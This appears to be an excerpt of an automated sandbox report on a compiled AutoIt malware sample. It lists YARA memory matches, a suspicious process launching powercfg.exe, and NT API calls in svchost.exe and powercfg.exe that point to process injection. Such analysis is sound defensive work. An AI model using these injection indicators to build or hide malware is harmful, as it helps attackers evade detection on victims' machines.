                Source: Yara matchFile source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: This is a third-party compiled AutoIt script.0_2_00653B3A
                Source: wWXR5js3k2.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: wWXR5js3k2.exe, 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc2c5e6b-f
                Source: wWXR5js3k2.exe, 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a6c17f90-e
                Source: wWXR5js3k2.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_35741a0d-d
                Source: wWXR5js3k2.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_afce573b-8
                Uses powercfg.exe to modify the power settings
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0262CD33 NtClose,2_2_0262CD33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03324340 NtSetContextThread,LdrInitializeThunk,5_2_03324340
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03324650 NtSuspendThread,LdrInitializeThunk,5_2_03324650
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322B60 NtClose,LdrInitializeThunk,5_2_03322B60
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03322BA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03322BF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03322BE0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322AF0 NtWriteFile,LdrInitializeThunk,5_2_03322AF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322AD0 NtReadFile,LdrInitializeThunk,5_2_03322AD0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322F30 NtCreateSection,LdrInitializeThunk,5_2_03322F30
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322FB0 NtResumeThread,LdrInitializeThunk,5_2_03322FB0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322FE0 NtCreateFile,LdrInitializeThunk,5_2_03322FE0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03322E80
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03322EE0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03322D30
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03322D10
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03322DF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322DD0 NtDelayExecution,LdrInitializeThunk,5_2_03322DD0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03322C70
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322C60 NtCreateKey,LdrInitializeThunk,5_2_03322C60
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03322CA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033235C0 NtCreateMutant,LdrInitializeThunk,5_2_033235C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033239B0 NtGetContextThread,LdrInitializeThunk,5_2_033239B0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322B80 NtQueryInformationFile,5_2_03322B80
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322AB0 NtWaitForSingleObject,5_2_03322AB0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322F60 NtCreateProcessEx,5_2_03322F60
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322FA0 NtQuerySection,5_2_03322FA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322F90 NtProtectVirtualMemory,5_2_03322F90
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322E30 NtWriteVirtualMemory,5_2_03322E30
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322EA0 NtAdjustPrivilegesToken,5_2_03322EA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322D00 NtSetInformationFile,5_2_03322D00
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322DB0 NtEnumerateKey,5_2_03322DB0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322C00 NtQueryInformationProcess,5_2_03322C00
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322CF0 NtOpenProcess,5_2_03322CF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03322CC0 NtQueryVirtualMemory,5_2_03322CC0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03323010 NtOpenDirectoryObject,5_2_03323010
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03323090 NtSetValueKey,5_2_03323090
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03323D10 NtOpenProcessToken,5_2_03323D10
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03323D70 NtOpenThread,5_2_03323D70
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A89630 NtReadFile,5_2_02A89630
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A897C0 NtClose,5_2_02A897C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A89720 NtDeleteFile,5_2_02A89720
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A894C0 NtCreateFile,5_2_02A894C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A89920 NtAllocateVirtualMemory,5_2_02A89920
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_006BA1EF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006A8310
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006B51BD
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0065E6A00_2_0065E6A0
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067D9750_2_0067D975
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006721C50_2_006721C5
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006862D20_2_006862D2
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006D03DA0_2_006D03DA
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0068242E0_2_0068242E
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006725FA0_2_006725FA
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006AE6160_2_006AE616
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006666E10_2_006666E1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0068878F0_2_0068878F
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006868440_2_00686844
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006D08570_2_006D0857
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006688080_2_00668808
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B88890_2_006B8889
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067CB210_2_0067CB21
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00686DB60_2_00686DB6
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00666F9E0_2_00666F9E
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006630300_2_00663030
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067F1D90_2_0067F1D9
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006731870_2_00673187
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006512870_2_00651287
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006714840_2_00671484
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006655200_2_00665520
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006776960_2_00677696
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006657600_2_00665760
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006719780_2_00671978
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00689AB50_2_00689AB5
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0065FCE00_2_0065FCE0
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006D7DDB0_2_006D7DDB
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067BDA60_2_0067BDA6
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00671D900_2_00671D90
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0065DF000_2_0065DF00
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00663FE00_2_00663FE0
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_032D35D00_2_032D35D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02618D532_2_02618D53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026032F02_2_026032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0262F3632_2_0262F363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0260E8EA2_2_0260E8EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0260E8F32_2_0260E8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0260E93C2_2_0260E93C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026029A02_2_026029A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026011802_2_02601180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026026B02_2_026026B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02616F432_2_02616F43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026107A32_2_026107A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0260E7A32_2_0260E7A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0261057A2_2_0261057A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026105832_2_02610583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5D4D24_2_02D5D4D2
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5F3114_2_02D5F311
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5F3084_2_02D5F308
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D7E0F14_2_02D7E0F1
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5D6CA4_2_02D5D6CA
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5D6814_2_02D5D681
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5D6784_2_02D5D678
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D65CD14_2_02D65CD1
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5D5314_2_02D5D531
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5F5314_2_02D5F531
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AA3525_2_033AA352
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033B03E65_2_033B03E6
